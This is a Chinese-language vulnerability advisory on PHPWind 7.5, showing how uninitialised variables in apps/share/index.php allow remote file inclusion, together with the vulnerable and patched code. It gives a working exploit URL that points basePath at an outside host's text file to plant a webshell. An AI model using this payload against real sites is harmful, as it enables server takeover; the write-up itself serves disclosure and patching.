PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。
Zoomeye Dork
apps/share/index.php 里$route和$basePath变量没有初始化,导致远程包含或者本地包含php文件,导致执行任意php代码
```
<?php
if ($route == "share") {
require_once $basePath . '/action/m_share.php';
} elseif ($route == "sharelink") {
require_once $basePath . '/action/m_sharelink.php';
}
?>
```
这个漏洞好象不太需要分析!!!! 我建议写这个代码的人应该扣除年终奖...
漏洞利用
浏览器访问
```
http://XXX/bbs/apps/share/index.php?route=groups&basePath=http:// XXX.cn/gm.txt?
```
访问后就可以包含文件并获得webshell(问号要带上,不然会失败)
phpwind 7.5
已经在这个补丁的同时'修补'了
http://www.phpwind.net/read-htm-tid-914851.html
```
<?php
!function_exists('readover') && exit('Forbidden');
if ($route == "share") {
require_once $basePath . '/action/m_share.php';
} elseif ($route == "sharelink") {
require_once $basePath . '/action/m_sharelink.php';
}
?>
```
京公网安备 11010502034610号
暂无评论